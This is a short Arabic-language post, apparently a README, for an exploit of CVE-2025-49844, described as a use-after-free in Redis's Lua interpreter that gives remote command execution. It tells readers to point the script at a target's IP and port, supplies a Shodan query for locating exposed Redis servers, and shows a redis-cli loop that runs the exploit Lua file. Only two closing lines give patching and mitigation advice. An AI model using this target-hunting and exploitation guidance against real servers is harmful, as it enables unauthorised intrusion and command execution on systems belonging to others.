
نص استغلال لثغرة CVE-2025-49844، وهي ثغرة استخدام بعد التحرير (use-after-free) في محلل Lua الخاص بـ Redis، مما يتيح تنفيذ الأوامر عن بُعد على خوادم Redis المعرضة للخطر.
باختصار وببساطة، تقوم بتشغيل هذا السكربت وبدلاً من
localhost
تضع عنوان IP الخاص بالهدف وتضبط المنفذ الخاص به، فيتصل إذا كان الهدف عرضة للثغرة ويمكنك تنفيذ أي أمر تريده.
في Shodan يمكنك أيضاً استخدام هذا البايلود للعثور على الأهداف المعرضة للثغرة
product:"Redis key-value store"
تحقق من الإصدار، إذا كان أقل من 8.2
while redis-cli -h localhost -p 6379 --eval CVE-2025-49844.lua >/dev/null; do
printf 'connect to server :) RCE'
done
إذا كان بإمكانك، قم بتحديث Redis إلى الإصدار 8.2.2 أو أحدث.
إذا لم تتمكن من التحديث، فعلى الأقل قم بتعطيل تنفيذ Lua للمستخدمين المجهولين أو غير الموثوقين.